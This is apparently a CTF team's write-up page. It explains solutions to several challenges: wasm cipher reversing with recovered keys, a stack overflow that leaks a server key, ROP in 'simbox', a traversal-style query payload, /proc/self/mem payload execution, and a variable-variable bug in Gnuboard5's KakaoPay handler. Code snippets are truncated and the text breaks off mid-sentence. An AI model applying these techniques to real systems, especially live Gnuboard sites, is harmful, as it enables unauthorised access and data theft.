SeungHyun Kim sqrtrev

#!/usr/bin/env python3
# Solver by parrot / Chance of success is 50%
from pwn import *
import time

def recvMenu():
    # Consume the banner up to the second separator line (pwntools expects bytes on Python 3)
    p.recvuntil(b'==================')
    p.recvuntil(b'==================\n')

def createAcc(uname):
    ...  # the rest of the gist is cut off on this page

(Written by okas832)

Analysis

The challenge encrypts the input with a wasm binary. By setting breakpoints on the call_indirect instructions, we found that it encrypts the input with 5 block/stream ciphers in random order.

List of ciphers:

  1. camellia with key [17, 34, 51, 68, 85, 102, 119, 136, 153, 170, 187, 204, 221, 238, 255, 0]
  2. AES-CBC with key [167, 65, 190, 20, 49, 221, 130, 73, 99, 87, 186, 241, 49, 174, 207, 213], iv [201, 25, 40, 200, 79, 198, 27, 232, 93, 121, 207, 131, 253, 149, 193, 133]
  3. Triple DES with key (b"HELPME!\x00", b"THANKS!\x00", [16, 32, 48, 64, 80, 96, 112, 128])

(Written by c0m0r1)

Simple Android app reversing with a native library. Just reversing the logic and running the solver code on an arm64-v8a Android phone with the given native library solves it.

#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <dlfcn.h>

(Written by Reinose. I just uploaded this)

Step 1. Leak the server key

First of all, the given program has a vulnerability when receiving the IV for AES-CBC-128: the IV buffer is 16 bytes, but a user can send up to 32 bytes into it. Since this overwrites the saved return address, the overwrite affects the exception-handling process. We fuzzed partial overwrites of the return address and found that changing it to somewhere inside the run function leaks the private key (e.g. 0x165a). By doing so, we got the secret key v0nVadznhxnv$nph.

(Written by Reinose. I just uploaded this)

# simbox

Step 1. Guest program exploit

simbox has an obvious vulnerability: it parses HTTP GET parameters onto the stack without any length limit, so we can easily trigger a stack buffer overflow and ROP. Additionally, there are no mitigations such as NX or ASLR. We found that the malloc chunk containing our input is located at 0x245a8.

(Written by okas832 and Reinose. I just uploaded this)

Step 1. Communicate with server

We need to serialize messages with protobuf to send data, but the protocol.proto file is not given. The serialized descriptor_pb2.FileDescriptorProto is at 0x416700:0x4168B0. We recovered protocol.proto by black-box analysis because we couldn't find any related documents.

0A 0E 70 72 6F 74 6F 63 6F 6C 2E 70 72 6F 74 6F    filename: "protocol.proto"
We can add more query variables using `;`, so we can bypass the filtering (they use parse_qsl to get the query).
Payload:
/view?{MyClienID}=flag;/%2e%2e/=123

Using STTF and nginx cache header, we can leak the admin's flag.

#!/usr/bin/env python3
import requests
import random
import time

target = 'http://35.187.204.223'
rfile = open('./a','r') # a has nothing interesting

We can save the payload in the username or somewhere else and then execute it by reading /proc/self/mem. Run both scripts at the same time: one of them injects payloads and the other searches for them. Since we are reading memory, some links that the script outputs might expire.

#!/usr/bin/env python3
import requests

# target = 'http://localhost:8002'
target = 'http://35.243.100.112'
# target = 'http://localhost:10100'

Gnuboard (Author: sqrtrev)

Looking at https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L65, the code uses the HttpClient class to communicate with $authUrl. Here $authUrl is passed via $_REQUEST (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L33), so it is a value we control. Looking at https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L176, the request is sent, and if it fails the response body is stored in $netcancelResultString. Afterwards, https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L186-L187 calls str_replace, and this is where the vulnerability occurs. Because of how PHP works, when a value is used in the form $$variable, it behaves like a reference to the variable whose name is the content of $variable. Therefore, the first str_replace makes it reference the content of $body, and the second str_replace accesses the variable we want. Here, since $authToken is a value we control (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L31), we decided to use that variable. Suppose we send authToken=flag and HttpClient->body returns authToken. During the str_replace step, $$Http->body == $authToken will hold. That is, `$netca